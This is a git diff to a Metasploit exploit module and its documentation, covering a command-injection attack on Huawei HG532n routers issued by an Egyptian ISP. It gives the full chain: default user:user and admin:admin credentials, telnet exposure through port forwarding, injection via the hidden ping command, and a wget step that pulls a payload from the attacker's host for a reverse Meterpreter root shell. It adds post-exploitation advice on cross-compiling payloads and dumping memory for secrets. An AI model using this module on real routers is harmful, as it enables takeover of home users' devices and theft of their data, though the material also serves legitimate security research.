diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
index 5080c34141..48209d7a72 100644
--- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
+++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
@@ -3,7 +3,7 @@
## Introduction
The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command
-injection exploit in the ping field of their limited shell interface.
+injection exploit in the hidden ping command of their limited shell interface.
Affected hardware/software version strings:
@@ -16,9 +16,28 @@ Affected hardware/software version strings:
Software Version: V100R001C105B016 TEDATA
```
+TE-Data, the incumbent ISP operator in Egypt, provided this router to customers
+by default. The web interface has two kinds of logins, a "limited" user:user login
+given to all customers, and an admin mode used by company's technical staff. For
+hosts within the ISP network, this web interface is remotely accessible.
+
+The web interface's user mode provides very limited functionality – only WIFI
+passwords change and NAT port-forwarding. Nonetheless by port forwarding the
+router's own (filtered) telnet port, it becomes remotely accessible. All installed
+routers have a telnet password of admin:admin.
+
+Due to the ISP's _encrypted_ runtime router configuration [*] though, the telnet
+daemon does not provide a direct linux shell. Rather a very limited custom shell
+is provided instead: "ATP command line tool". The limited shell has a ping command
+which falls back to the system shell though (`ping %s > /var/res_ping`). We exploit
+that through command injection to gain Meterpreter root access.
+
+[*] `` at `/etc/defaultcfg.xml`
## Usage
+With an attacker node that resides within the ISP network, do:
+
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
- Set `RHOST` to the target router's IP
@@ -68,7 +87,7 @@ and `DOWNFIILE` to the payload's path on that server. Run the exploit
afterwards.
-## Live Scenario
+## Live Scenario (Verbose)
```
$ msfconsole
@@ -156,3 +175,78 @@ Architecture : mips
Meterpreter : mipsbe/linux
meterpreter >
```
+
+## Post-exploitation
+
+### MIPS toolchain
+
+Beside a basic meterpreter shell, you can compile your own C programs and
+run them on the device! Download the [Sourcery CodeBench Lite](https://sourcery.mentor.com/GNUToolchain/package13838/public/mips-linux-gnu/mips-2016.05-8-mips-linux-gnu-i686-pc-linux-gnu.tar.bz2)
+MIPS toolchain then compile your programs in the following manner:
+
+
+```
+#!/bin/bash
+
+TOOLCHAIN_ROOT=mips-2016.05
+CROSS_COMPILE=$TOOLCHAIN_ROOT/bin/mips-linux-gnu-
+
+${CROSS_COMPILE}gcc \
+ --sysroot=${TOOLCHAIN_ROOT}/mips-linux-gnu/libc/uclibc/ \
+ -Wl,-dynamic-linker,/lib/ld-uClibc.so.0 \
+ -static \
+ program.c
+
+${CROSS_COMPILE}strip -s a.out -o payload
+```
+
+Then call `wget` to download and run the generated `payload` above. Be careful
+of the device's own wget call conventions below.
+
+### A special wget command
+
+Huawei crafted their own `wget` implementation inside the shipped version of
+busybox. It has the following syntax:
+
+
+```
+meterpreter > shell
+Process 17951 created.
+Channel 1 created.
+wget -h
+wget: invalid option -- h
+BusyBox vv1.9.1 (2012-10-16 22:24:47 CST) multi-call binary
+
+Usage: wget [OPTION]... HOST
+
+wget download and upload a file via HTTP
+
+Options:
+ -g Download
+ -s Upload
+ -v Verbose
+ -u Username to be used
+ -p Password to be used
+ -l Local file path
+ -r Remote file path
+ -P Port to be used, optional
+ -B Bind local ip, optional
+ -A Remote resolved ip, optional
+ -b Transfer start position
+ -e Transfer length
+ -m Max transfer size
+ -c Compress downloaded file
+```
+
+### Rootfs image
+
+Extract `/dev/mtdblock[0123]` images from the device to gain full raw access to
+the flash. Use [binwalk](https://github.com/devttys0/binwalk) on the extracted
+`/dev/mtdblock3` contents to get a full squashfs rootfs image.
+
+The most important files in the rootfs image are encrypted though. Nonetheless,
+by dumping `/dev/mem` contents and looking for the juicy bits, you will find
+all the necessary information needed ;-)
+
+Note that even after configuration decryption, all the now-plaintext important
+configuration files store passwords in a SHA-256 hashed form. Be creative.
diff --git a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
index a42a1f8208..b180ffc16d 100644
--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -17,35 +17,22 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(
info,
'Name' => 'Huawei HG532n Command Injection',
- 'Description' => %q{
+ 'Description' => %q(
+ This module exploits a command injection vulnerability in the Huawei
+ HG532n routers provided by TE-Data Egypt, leading to a root shell.
- The Huawei HG532n routers are vulnerable to a command injection exploit
- in the ping field of their limited shell interface.
+ The router's web interface has two kinds of logins, a "limited" user:user
+ login given to all customers and an admin mode. The limited mode is used
+ here to expose the router's telnet port to the outside world through NAT
+ port-forwarding.
- TE-Data, the incumbent ISP operator in Egypt, provides this router to
- customers by default. The web interface has two kinds of logins, a
- "limited" user:user login given to all customers, and an admin mode used
- by company's technical staff. From machines within the TE-Data network,
- this web interface is remotely accessible.
-
- The web interface's user mode provides very limited functionality, only
- WIFI passwords change and NAT port-forwarding. Nonetheless by port
- forwarding the router's own (filtered) telnet port, it becomes remotely
- accessible. All installed routers have a telnet password of admin:admin.
-
- Due to the ISP's (encrypted) runtime router configuration [*] though,
- the telnet daemon does not provide a direct linux shell. Rather a very
- limited custom shell is provided instead: "ATP command line tool". The
- limited shell has a ping command which falls back to the system shell
- though ("ping %s > /var/res_ping"). We exploit that through command
- injection to gain Meterpreter root access.
-
- [*]
- at encrypted, read-only, /etc/defaultcfg.xml.
- },
+ With telnet now remotely accessible, the router's limited "ATP command
+ line tool" (served over telnet) can be upgraded to a root shell through
+ an injection into the ATP's hidden "ping" command.
+ ),
'Author' =>
[
- 'Ahmed S. Darwish ', # Vulnerability discovery + msf module
+ 'Ahmed S. Darwish ', # Vulnerability discovery, msf module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
@@ -480,16 +467,7 @@ class MetasploitModule < Msf::Exploit::Remote
srv_port = datastore['SRVPORT'].to_s
output_file = "/tmp/#{rand_text_alpha_lower(8)}"
- # Custom Huawei busybox (v1.9) wget
- #
- # Options:
- # -g Download
- # -s Upload
- # -v Verbose
- # -l Local file path
- # -r Remote file path
- # -P Port to be used, optional
- #
+ # Check module documentation for the special wget syntax
wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"
execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.